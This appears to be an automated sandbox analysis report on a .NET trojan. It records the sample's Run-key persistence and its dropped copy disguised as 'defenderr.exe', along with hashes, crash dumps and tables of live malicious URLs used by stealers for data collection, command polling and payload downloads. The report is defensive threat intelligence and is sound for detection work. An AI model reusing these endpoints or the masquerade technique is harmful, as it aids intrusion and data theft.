09:33:35	API Interceptor	2x Sleep call for process: WerFault.exe modified
09:33:35	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run e162b1333458a713bc6916cc8ac4110c C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
141.8.197.42	442.111).lnk	Get hash	malicious	Unknown	Browse	a0705880.xsph.ru/selection/seedling.txt
	htmlayout.dll	Get hash	malicious	Unknown	Browse	a0747694.xsph.ru/serv.php
	qRsw2oZH24.exe	Get hash	malicious	Panda Stealer	Browse	crimestreetsru.ru.xsph.ru/collect.php
	svchost.exe	Get hash	malicious	Panda Stealer	Browse	asdqwezxc.ru.xsph.ru/collect.php
	btwGaban.exe	Get hash	malicious	CollectorGoomba, Panda Stealer	Browse	a0680922.xsph.ru/collect.php
	v8YnxUbz23.exe	Get hash	malicious	Amadey RedLine SmokeLoader Tofsee Vidar	Browse	a0620960.xsph.ru/5.exe
	6CQieC3oMC.exe	Get hash	malicious	Amadey Raccoon RedLine SmokeLoader Tofsee Vidar	Browse	a0620960.xsph.ru/5.exe
	Oo8GcnVrGH.exe	Get hash	malicious	Raccoon RedLine SmokeLoader Tofsee Vidar	Browse	a0620960.xsph.ru/5.exe
	ADNOC RFQ 88556524.xlsx	Get hash	malicious	Unknown	Browse	a0599932.xsph.ru/GrBwWewiSjoPFvO.exe
	P5dD4xbWeX.exe	Get hash	malicious	Unknown	Browse	a0568605.xsph.ru/forinstalls2.exe
	294J8weDKq.exe	Get hash	malicious	BlackNET	Browse	a0541862.xsph.ru//getCommand.php?id=VGVzdF85MDI1MTczQw
	KVINC5FNPj.exe	Get hash	malicious	Unknown	Browse	a0510942.xsph.ru/gate.php
	uZS3kvK3Q6.exe	Get hash	malicious	Unknown	Browse	a0480986.xsph.ru/api/download.get
	windows.exe	Get hash	malicious	Poullight	Browse	f0427103.xsph.ru/gate.php
	Xenos (2).exe	Get hash	malicious	Unknown	Browse	a0458390.xsph.ru/upload.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SPRINTHOSTRU	http://f0827197.xsph.ru/000/0101/battle/?login=john.gdoe@arcadia.io	Get hash	malicious	Unknown	Browse	141.8.192.151
	acctspay ACH_INSTRUCTIONSpdf.shtml	Get hash	malicious	Unknown	Browse	141.8.192.169
	file.exe	Get hash	malicious	Tofsee	Browse	185.185.68.207
	rskovbrand.exe	Get hash	malicious	FormBook, GuLoader	Browse	141.8.192.93
	7SzUgdO8Ne.exe	Get hash	malicious	FormBook, GuLoader	Browse	141.8.192.93
	Archd.exe	Get hash	malicious	FormBook, GuLoader	Browse	141.8.192.93
	file.exe	Get hash	malicious	Tofsee	Browse	141.8.195.197
	Y0VyFqYj2i.exe	Get hash	malicious	Tofsee	Browse	141.8.195.197
	5zZPgwyy8n.exe	Get hash	malicious	Tofsee	Browse	141.8.195.197
	vk8Xlb1vw3.exe	Get hash	malicious	Tofsee	Browse	141.8.195.197
	file.exe	Get hash	malicious	Tofsee	Browse	141.8.195.197
	file.exe	Get hash	malicious	Amadey, Fabookie, PrivateLoader, RedLine, Tofsee	Browse	185.185.70.73
	Gardenizes.exe	Get hash	malicious	FormBook, GuLoader	Browse	141.8.192.93
	ufuldkommenhederne.exe	Get hash	malicious	FormBook, GuLoader	Browse	141.8.192.93
	file.exe	Get hash	malicious	Tofsee	Browse	185.185.70.73
	file.exe	Get hash	malicious	PSWmarket	Browse	141.8.194.203
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.251.88.43
	Eksproprieringsplanerne.exe	Get hash	malicious	FormBook, GuLoader	Browse	141.8.192.93
	Systemsikkerhed.exe	Get hash	malicious	FormBook, GuLoader	Browse	141.8.192.93
	unaugmentative.exe	Get hash	malicious	FormBook, GuLoader	Browse	141.8.192.93

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\svchosts.exe	file.exe	Get hash	malicious	BlackNET, DarkComet	Browse
	a.exe	Get hash	malicious	BlackNET	Browse
	B30EEBF734354F55373978E395C912393F3C674AAA471.exe	Get hash	malicious	BlackNET	Browse
	E6507F36045C13DEE736BEA44D61E90169EA69DE61E9D.exe	Get hash	malicious	BlackNET	Browse
	PopbBQv0MC.exe	Get hash	malicious	BlackNET	Browse
	Win_Updates.exe	Get hash	malicious	BlackNET	Browse

Created / dropped Files

C:\ProgramData\Microsoft\MyClient\defenderr.exe

Download File

Process:	C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	187904
Entropy (8bit):	5.978372519881584
Encrypted:	false
SSDEEP:	1536:XgzTtxCCkI7Yq0GzAc4xYEwbJbSDzlkW3zzxV/A8:QzTeLuzAGbJUGWv/A8
MD5:	D677C626953C9BA17B3D094A83B1048E
SHA1:	BF78AF289038B4C088B7679A3D08627DAC4883BD
SHA-256:	4D178E10389731A660D8DC1240F6D64723AAE55AD953150BED2520D2C39E6644
SHA-512:	A6089DF6A109CE91644E338B98EE9DE96FA1A13040315E05CCAC4AFD362233CBBB8057CF5BB66DE606C9231059D5BDE29AB6CD92FB811BF086057A311FC60418
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 49%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y.-a............................nL... ...`....@.. .......................@............@..................................L..O....`....................... ....................................................... ............... ..H............text...t,... ...................... ..`.rsrc........`.......0..............@..@.reloc....... ......................@..B................PL......H........4..$............................................................$..Y.)./.o.W._.S=..X^Jp...o....I$.u...9o9..S......85.JE.o[...>...4>....o.<.......X...........7c%..x{..y.Q.v.Z..~E.wc.....z...1s>.7G..z..4.g.X..g...ts........8....$"._..C%K.W~.X.geg...Gii&..5.8.T....G..2..X\|.-..#....p8...8...J.L..{..L.H.%v.J.2@..X...2.fr.. X&.....Wrg..0......Q...8..&..@z..;.o.c.?HM..T:..j.%.a..<.[.v.7.S...5do...)..'.h..!...)......).....Rv...-.E...0ui..BN...fN]3.}.....b.

C:\ProgramData\Microsoft\MyClient\defenderr.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_UPFNETTGWI1LHFPX_822adcd3087cb97c09b68d59117663987f8378_aca68100_0c314f9b\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.4831832388752193
Encrypted:	false
SSDEEP:	192:qZVmDyTg+kHleUVayIMkcu4sTBuvmPhZgN32/u7sPS274ltez:I5gNleUVaFMk77u5N32/u7sPX4ltK
MD5:	30A71E717478C3116A0C3230C02AEAD6
SHA1:	72A5A38B1C6D6E032F8263407BA3A31170957DC2
SHA-256:	2DEF636DFAE677EBADEDEFF0BCCE227BEB12409F582C5A91D48D287368148D5E
SHA-512:	AAEFAF132FD482C45E14000B878B2161EDA96218EEA53E596754357741D422D4AB52D0E1069BA131B5A477A56C49D927FE7A82E130EA9A6C711C1FEF6C230CF3
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.3.1.5.7.9.6.5.3.0.8.7.1.3.0.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.3.1.5.7.9.6.5.5.2.7.4.6.4.2.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.8.c.d.6.4.c.b.-.d.7.c.8.-.4.6.4.3.-.a.c.7.2.-.a.b.a.1.4.d.5.1.a.f.b.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.9.4.1.c.8.f.e.-.0.e.8.3.-.4.f.9.4.-.8.1.3.e.-.2.e.a.b.e.9.f.7.2.9.c.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.H.E.U.R.-.T.r.o.j.a.n...W.i.n.3.2...G.e.n.e.r.i.c.-.4.d.1.7.8.e.1.0.3.8.9.7.3.1.a.6.6.0.d...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.f.8.-.0.0.0.1.-.0.0.1.f.-.1.a.6.d.-.8.b.a.5.0.2.a.2.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.0.3.3.a.2.8.7.9.5.e.6.7.9.7.b.a.f.6.1.f.2.8.5.a.1.a.0.9.c.d.3.0.0.0.0.0.0.0.0.!.0.0.0.0.b.f.7.8.a.f.2.8.9.0.3.8.b.4.c.0.8.8.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_UPFNETTGWI1LHFPX_822adcd3087cb97c09b68d59117663987f8378_aca68100_1ad8b1b5\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.4953910438569813
Encrypted:	false
SSDEEP:	192:0KZmDyTgIkHleUVa18XkcUOwk3sRmlh1fsUg/u7sPS274ltez:V1grleUVaeXk9Gs+sUg/u7sPX4ltK
MD5:	83CA629C76F90F1C8D2B074A0BBB80E6
SHA1:	75982E693D96982070F962C520C0AAA984043382
SHA-256:	619C5DF212FC8A77FCBC340236319072811E1AE43E76EF8312325AD2E6E97850
SHA-512:	5391C81F6A4CFED75B9535CA47B7E7FF495614ECABF92AE97B5BE19DF5F6C8704EFA4F92DA539E1476DEC9F34CFEF830F99F0C35C575198120ADA8EF938A87A8
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.3.1.5.7.9.6.0.7.6.1.8.0.7.7.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.3.1.5.7.9.6.1.0.0.2.4.3.1.6.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.b.e.1.0.2.0.0.-.4.b.2.9.-.4.d.2.4.-.9.8.b.5.-.8.1.6.c.b.8.2.a.5.d.7.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.7.f.4.d.1.b.8.-.7.4.0.1.-.4.3.b.4.-.a.5.9.0.-.6.2.a.5.3.6.f.0.7.4.7.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.H.E.U.R.-.T.r.o.j.a.n...W.i.n.3.2...G.e.n.e.r.i.c.-.4.d.1.7.8.e.1.0.3.8.9.7.3.1.a.6.6.0.d...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.6.4.-.0.0.0.1.-.0.0.1.f.-.5.6.5.b.-.a.a.9.0.0.2.a.2.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.0.3.3.a.2.8.7.9.5.e.6.7.9.7.b.a.f.6.1.f.2.8.5.a.1.a.0.9.c.d.3.0.0.0.0.0.0.0.0.!.0.0.0.0.b.f.7.8.a.f.2.8.9.0.3.8.b.4.c.0.8.8.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER43E3.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Sun Jun 18 16:34:13 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	946815
Entropy (8bit):	3.284668524639444
Encrypted:	false
SSDEEP:	12288:HuC0Zqj0jliKlCk45V1wxD2s27a+PY/QVhx:HuCY2/xY
MD5:	3479E2EEC52129345C621E24EA475891
SHA1:	914C44BEC82C6C22E26F4E7C29341E0E47324F8B
SHA-256:	6C3DA492A93E175B2B9B98C70DA1C6D213AC7AD591458760CA9D4CD9F33AE9C6
SHA-512:	5F53A63E72FD9CD7BB632D4E186C2F292008D8C2839DE0169F455B5EE2A19B846ED891CEC31EF7B3F5CE2A9BB508C3390ECA6118D1B52EF01A05944E0F26855C
Malicious:	false
Preview:	MDMP....... ........2.d............$............*..D.......<....5......D... 6......T...............l.......8...........T............t..w...........dS..........PU...................................................................U...........B.......U......Lw......................T............1.d............................. ..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A1E.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	9176
Entropy (8bit):	3.711654004625536
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNijaY6YqR6gmfZ2gSvCpr989bbvnfBpm:RrlsNieY6Ys6gmfEgSdbffe
MD5:	0F853B809C5D5E08BF2F4767341D0ADF
SHA1:	834FED75116D07B8BE588D066A47D59713CDAFA0
SHA-256:	3B9CCEF1A6955CA1D3CB72F054C49734EA0D1A1DBF9F1A7A65DA0DFB0FC493DA
SHA-512:	55F7D97240D3B5E5303498EF7C37ACF0537257E4FB3DD8BD2BCAABEFD8BBCD25C8A92C12D5BA346985CD1EE9D5882DF49B16652469848149F8DAE7A432EFA0F3
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.4.8.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4ABB.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4930
Entropy (8bit):	4.564180894893848
Encrypted:	false
SSDEEP:	48:cvIwSD8zs0BJgtBI9XjDXWgc8sqYjs8fm8M4Jp5H2FUoyq8vH5HTEeDBoofd:uITf0TdagrsqYtJLoWlEeDBoofd
MD5:	489924524ECC28008DF96D464CF5570C
SHA1:	16D41FECD04B719A4D0ACA7883C0D984ED679062
SHA-256:	39F2CE7D1A0E30A168E7A3E6B827C2EB06C08F2FE7D3126838F8E9F094AE660D
SHA-512:	082EA23642AFFE272D606ED77B83D3B1E1EAF22F554FB2578CF5F3BE542217E70395A1B3B01923313B37F4ECF62A16B6713A06BE66344FB693988AE71A4C550E
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2090984" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9246.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Sun Jun 18 16:33:28 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	919171
Entropy (8bit):	3.1716213348476967
Encrypted:	false
SSDEEP:	12288:TfoVFL2OHG9eVwJ9iP7vFVxM9XQbT8Zqj0jliKlCk45V1wNnu7hUXQuPfrfJ+:TgZ7Orfd
MD5:	878D1A04A316D5F0729197376495081C
SHA1:	5C1F8B240103389D69CC51774ED98355A83CEB32
SHA-256:	2137FA270E632DA686220892B26AB98EFD01AF693F8A48846A2FA3B2D45C818C
SHA-512:	2D4EBE5FA64908DCD1636A40CBE940BFCF327994647BAB63ED699F9B7D8E3197EA3FAD88E387CC89DAE1E1D603DBB1EC557BD49BC99D7D43CA4555C41691820B
Malicious:	false
Preview:	MDMP....... ........1.d........................x+..........<...\|7......<....7......................l.......8...........T...............c...........V...........X...................................................................U...........B......xY......Lw................H.....T.......d....1.d.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER997B.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	9478
Entropy (8bit):	3.7158249613047816
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNi9wF6YqbtsLgmfZ2gSvCpr289bKnNfHOm:RrlsNiKF6YGtQgmfEgS4KNf3
MD5:	8C67943DD59E983036E42F3EEA7254FA
SHA1:	2ED36ED6BC4DB7C2DC78EFAFEA9C600E07BDDF6B
SHA-256:	349F60E84193A90A022638CADF2E62B243E58A7147F44F8D9F644B0C8797AFDB
SHA-512:	10E52EDE50941FC7BFE4238BA70BCA8C71E6AB7CF3D369378B336ADD0A73E64070C5325D18996B1D102080B6ED5F29F4199D4792E2C4B51697BA9C3553C5ACEF
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.1.9.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9A18.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4930
Entropy (8bit):	4.56436006520471
Encrypted:	false
SSDEEP:	48:cvIwSD8zs0BJgtBI9XjDXWgc8sqYjJ8fm8M4Jp5H2F8yq8vH5HfEeDBooZd:uITf0TdagrsqYKJ3WpEeDBooZd
MD5:	B0A90FEFE550B1571B67B3B3915EFE00
SHA1:	16062890E70E14E19AC3C0C935BD83319FCF898D
SHA-256:	F5E2911DEB91EE5B6169A7700CFF2440D3AF30DA4586B935B3AD7A05DE6C327B
SHA-512:	C491CE171CFADDF6DAB7BB1EA1A7DE6C3E1891D01BF5BEFED695EF51FB1954006AA96037F4C1CF098C0BB660BB266BAB9602CD6652CF080126EA4BBEE2FF4F07
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2090984" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe.log

Download File

Process:	C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1742
Entropy (8bit):	5.381353871108486
Encrypted:	false
SSDEEP:	48:MxHKEYHKGD8Ao6+vxpNl1qHGiD0HKeGitHTG1hAHKKPJAmHKoA9:iqEYqGgAo9ZPlwmI0qertzG1eqKPJ/qT
MD5:	978918F6120A43D1FA5899938A5A542F
SHA1:	6567A2E687B40BFD3A46246F51F4C89D93D89455
SHA-256:	F814F290A540B3FD755D05F3434317D7B26F2C33D2087F9E63233CD88AB510FC
SHA-512:	1DF2AF5A3F8212BF591AAA366FE96F167F3E6D43746E07B7CD44F1B2F06C63B1D290412891AD0B4D0A82D1DFD6EB2EB7D70981C35941F370DC97729E9205DD53
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\f2e0589ed6d670f264a5f65dd0ad000f\Microsoft.VisualBasic.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_6

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\defenderr.exe.log

Download File

Process:	C:\ProgramData\Microsoft\MyClient\defenderr.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1742
Entropy (8bit):	5.381353871108486
Encrypted:	false
SSDEEP:	48:MxHKEYHKGD8Ao6+vxpNl1qHGiD0HKeGitHTG1hAHKKPJAmHKoA9:iqEYqGgAo9ZPlwmI0qertzG1eqKPJ/qT
MD5:	978918F6120A43D1FA5899938A5A542F
SHA1:	6567A2E687B40BFD3A46246F51F4C89D93D89455
SHA-256:	F814F290A540B3FD755D05F3434317D7B26F2C33D2087F9E63233CD88AB510FC
SHA-512:	1DF2AF5A3F8212BF591AAA366FE96F167F3E6D43746E07B7CD44F1B2F06C63B1D290412891AD0B4D0A82D1DFD6EB2EB7D70981C35941F370DC97729E9205DD53
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\f2e0589ed6d670f264a5f65dd0ad000f\Microsoft.VisualBasic.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_6

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.9260988789684415
Encrypted:	false
SSDEEP:	3:Nlllulb/lj:NllUb/l
MD5:	13AF6BE1CB30E2FB779EA728EE0A6D67
SHA1:	F33581AC2C60B1F02C978D14DC220DCE57CC9562
SHA-256:	168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
SHA-512:	1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
Malicious:	false
Preview:	@...e................................................@..........

